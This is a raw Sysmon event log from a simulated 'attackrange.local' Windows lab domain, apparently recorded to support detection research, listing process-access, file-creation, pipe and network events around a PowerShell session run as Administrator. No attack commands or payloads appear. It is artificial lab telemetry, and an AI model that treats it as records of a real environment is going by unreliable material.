08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000810029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:47.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF770AC0A3048E6A1A02054074EBDA0,SHA256=D0C0664835B821EAFEB18157A8C9D8990742B4415446C79C7DA12C94E486E131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4F97A1C06BB6A0F3AF2529FD8F816,SHA256=5F748AEAC079DFC110C7AAC06570932ABA43918DE69FEE359651A2C3B7B64701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7ECE222DC7423A14F8E471ADB8BB80A,SHA256=DBDCAF7697BB96A9EE9FC2B3D8BBADF435832B3CD39259EB17F7DB78E77B502B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C603B8320AE7E1591B5BC52C6D7ADD,SHA256=D3C5415F2308CA681012F1D9A50ADF4C9576C1F59E29B850B70C4DA257525F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65DA1EE0F7F3DCF795EDDC9439BED0FC,SHA256=3581FAE1A2EBC7B391D34DB55027FB6D3A76C1211B3C15B5B0799C324C47C03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3164F5F8B1C1F6A9551B236DABF325FA,SHA256=999895E55E71CC3D13987F7A836F839C45CE2CDA970A4C9A92E6F85B5191E06D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0DF27C3AD9F0BA29F441DA86DAFCA65,SHA256=8269428FB1AAB06A64ACAB5CB9DE326F39F83C2C152E79358EABEF0EC8DE6A83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:46.347{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57437-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001054048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.445{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.445{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001054046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:05:47.393{466BC892-F7DB-60EB-DC7D-00000000CF01}4252\PSHost.132705507470853828.4252.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.361{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2cgd4atj.dz1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.361{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_24cpbby1.i02.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.345{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_24cpbby1.i02.ps12021-07-12 08:05:47.345 10341000x80000000000000001054042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.308{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf75ae04.TMPMD5=3B3356EA87C16A41CA99C78E371E6C1E,SHA256=63AD88A80C8FEC2BEECFC6DB2EBD92E331FA5DC4724A25A0B4B943FB61C3261B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.245{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.192{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.192{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 